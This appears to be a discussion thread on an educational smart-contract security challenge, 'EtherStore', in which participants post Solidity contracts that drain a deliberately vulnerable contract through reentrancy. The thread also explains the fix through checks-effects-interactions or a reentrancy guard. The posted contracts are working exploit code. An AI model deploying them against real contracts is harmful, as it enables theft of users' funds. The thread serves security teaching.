EtherStore

[passandscore]

EtherStore

The Etherstore is loaded with funds, but its implementation is flawed. Uncover the vulnerability and drain all the funds.

Author: passandscore

[AE-0h]

[passandscore]

@AE-0h Does this work? I attempted it but when I call attack on the Etherstore with 1 eth of value, I get an error.

[AE-0h]

Here is the updated code, using fallback. Should work, might need to up the gas limit in remix.

pragma solidity ^0.8.25;


interface EtherStore {
    function deposit() external payable;
    function withdraw() external;
}

contract AEDrain {
     EtherStore public ethStore;

    constructor(address ethStoreAddr) {
        ethStore = EtherStore(ethStoreAddr);
    }

    fallback() external payable {
        if (address(ethStore).balance >= 1 ether) {
            ethStore.withdraw();
        }
    }

    function attack() external payable {
        require(msg.value >= 1 ether);
        ethStore.deposit{value: 1 ether}();
        ethStore.withdraw();
    }


} 

[passandscore]

🎉 I got that to work. Great job @AE-0h . So how would you fix the Etherstore contract to prevent this vulnerability?

[AE-0h]

I would adjust the user balance in the withdraw function before the call to send value to the functions caller. For example...

  uint256 userBalance = balances[msg.sender];
  require(userBalance > 0, "Insufficient balance");

  balances[msg.sender] = 0; 

  (bool sent, ) = msg.sender.call{value: userBalance}("");
  require(sent, "Failed to send Ether");
} 

[scadamsUAB]

Good solution that meets the requirement to drain the target contract. One minor issue is that the attacking contract does not have a withdraw function so the funds would then be stuck there

[scadamsUAB]

Code is below with comments for the exploit contract.

This is a standard example of a re-entrancy attack which is caused when an attacker can use a contract with a fallback/receive function to reenter the the withdraw function prior to updating the contract accounts balance locally.
To fix it, always update the balance before sending funds

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.25;

// Create an Interface to handle the structure of the target contract
// This assumes the target will have a deposit and withdraw function
// and will work for all vulnerable contracts that have those methods
interface TargetContract {
    function deposit() external payable;
    function withdraw() external;
}

// This is an example of a re-entracy attack exploit contract
contract Challenge1Solution {

    // used to ensure only the creator of the exploit contract can use it
    address owner;
    // used to keep track of the initial amount deposited
    uint256 amount_deposited;
    // used to keep track of how much was stolen
    uint256 amount_stolen;
    // used to set the address of the contract to exploit
    address target;
    // used to create an instance of the target contract to gain access to the functions it uses
    
    // It currently handles one target at a time.  Mappings could be used to keep a list of multiple contracts
    
    TargetContract target_instance;
    constructor (address _owner)
    {
        owner=_owner;
    }

    // Used so the malicious actor can see what the current target address is
    function get_current_target() external view returns(address){
        require(msg.sender == owner,"Invalid Sender");
        return target;   
    }

    // Used to set the current target
    function set_target(address _target) external {
        target = _target;
        target_instance=TargetContract(target);
    }
       
    /**
     * @dev Allows the owner to deposit funds into the target contract. This should be called by the owner only. The value sent with this transaction will be deposited into the target contract.
     */ // Used to set some amount of funds and send them to the target so they can be withdrawn
    function load_initial_funds() payable external
    {
        require(msg.sender == owner,"Invalid Sender");
        require(target != address(0), "Set Target");
        target_instance.deposit{value:msg.value}();
        amount_deposited=msg.value;
    }
    function attack()external{    
        require(msg.sender == owner,"Invalid Sender");
        require(target != address(0), "Set Target");
        target_instance.withdraw();
    }
    // Fall back function. This is triggered when the target_contract sends the funds
    // It updates the tracker to see how much was stolen and then recalls the withdraw function
    receive() external payable {
        // Update the local value to track how much as been stolen (For bragging rights and situational awareness) 
        amount_stolen=amount_stolen+msg.value;
        // Must perform a check because the transaction will fail and revert when the balance 
        // reaches a point below what is being withdrawn by the attacker
        if (address(target).balance >=  amount_deposited){
            target_instance.withdraw();
        }
     }

    // ALlows the owner to withdraw the funds from the exploiter contract 
    function withdraw() external {
        require(msg.sender == owner,"Invalid Sender");
        
        (bool sent, ) = msg.sender.call{value: amount_stolen}("");
        require(sent, "Failed to send Ether");

        amount_stolen = 0;

    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}

[JamesKm08]

This is my solution. I added just below the EtherStore contract so there was no need for an interface.

contract attackEtherStore {
    EtherStore ethStoreAttacker;

    constructor(EtherStore _ethStoreAttacker) {
      ethStoreAttacker = _ethStoreAttacker;
    }

    function attack() public payable {
      require(msg.value >= 1 ether);
      ethStoreAttacker.deposit{value:1 ether}();
      ethStoreAttacker.withdraw();
   }
    receive() external payable{
      if(address(ethStoreAttacker).balance >= 1 ether){
          ethStoreAttacker.withdraw();
    }
  }

}

[passandscore]

That works. Was there any aspect that you found challenging?

[JamesKm08]

Other than it reverting when depositing 1 ether I think it was pretty good for starters

[codyrhoten]

Here is my solution:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.25;

import "./Challenge.sol";

contract Attacker {
    EtherStore public etherStoreContract;

    constructor(address etherStoreContractAddress) {
        etherStoreContract = EtherStore(etherStoreContractAddress);
    }

    function performAttack() internal {
        if (address(etherStoreContract).balance >= 1 ether) {
            etherStoreContract.withdraw();
        }
    }

    receive() external payable {
        performAttack();
    }

    fallback() external payable {
        performAttack();
    }

    function attack() external payable {
        require(msg.value >= 1 ether, "Send at least 1 ether");
        etherStoreContract.deposit{value: 1 ether}();
        etherStoreContract.withdraw();
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }

    function gainStolenFunds() public {
        payable(msg.sender).transfer(address(this).balance);
    }
}

To prevent this kind of attack, we can use the check-effect-interactions pattern in the withdraw() function. This is basically updating the contract's state (i.e. the user's balance in this case) before making the ether transfer from contract to caller's address. There's also the ReentrancyGuard that can be inherited from Open Zeppelin.

[Chinwuba22]

Problem: failure to implement CEI in the withdraw function

contract Attacker {
    EtherStore etherStore;
    uint256 AMOUNT = 10000000000000000;
    
    constructor(address _etherStore) {
        etherStore =  EtherStore(_etherStore);
    }

    function attack() public payable  {
        etherStore.deposit{value: AMOUNT}();
        etherStore.withdraw();
    } 

     fallback() external payable {
        if (address(etherStore).balance >= AMOUNT) {
            etherStore.withdraw();
        }
}
}

[0xramrapolu]

The import in the test has a spell mistake and Capital S was missing and the forge build throws an error file not found.
import {EtherStore} from "src/exploits/ether-store/Etherstore.sol";

[passandscore]

Fixed. Thanks for catching that.